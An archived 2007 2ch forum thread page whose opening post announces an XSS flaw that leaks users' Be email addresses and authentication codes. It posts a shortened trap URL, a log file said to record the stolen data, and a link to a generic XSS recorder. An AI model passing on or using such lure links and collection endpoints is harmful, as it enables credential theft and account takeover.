■ このスレッドは過去ログ倉庫に格納されています
IE等普通のブラウザで見る場合 http://tubo.80.kg/tubo_and_maru.html
専用のブラウザで見る場合 http://www.monazilla.org/
2ちゃんねる Viewerを使うと、すぐに読めます。 http://2ch.tora3.net/
この Viewer(通称●) の売上で、2ちゃんねるは設備を増強しています。
●が売れたら、新しいサーバを投入できるという事です。
よくわからない場合はソフトウェア板へGo http://pc11.2ch.net/software/
モリタポを持っていれば、50モリタポで表示できます。
【速報】 俺、2chにBeのメアドと認証コードが漏れるXSS脆弱性を発見
- 1 :スレ立て代行@大学中退(兵庫県) :2007/11/27(火) 23:22:25 ID:EbtVATOs0● ?2BP(2350)
- 俺こと脱帽は、先日のいつか忘れたけど2chにXSSの脆弱性を発見した。
今回は通常のウェブブラウザ(除く専ブラ)からBeにログインした状態で
任意のURLにアクセスするとBeのメアドと認証コードが漏れる脆弱性であり、
それによってアカウント乗っ取りやプロフィールの変更が可能になってしまう。
現時点で数箇所のCGIで同脆弱性を確認しているが、この限りではない可能性もある。
サンプルURLを貼って置くが絶対に悪用しないよう注意を促したい。
http://z.la/ms0k2 (短縮URL、罠なので踏む時は注意)
http://moyashi.sosite.jp/xss/log.txt (盗まれた情報が記録されるファイル)
▼ 汎用XSS記録装置
http://moyashi.sosite.jp/xss/
▼ 俺公式サイト
http://manabi.homeunix.net/
総レス数 1001
182 KB
[ 2ちゃんねる 3億PV/日をささえる レンタルサーバー \877/2TB/100Mbps]
取りに行ったけどなかった。次は一時間後に取りに行くです。
read.cgi ver 05.0.4.9 2007/06/21
FOX ★ DSO(Dynamic Shared Object)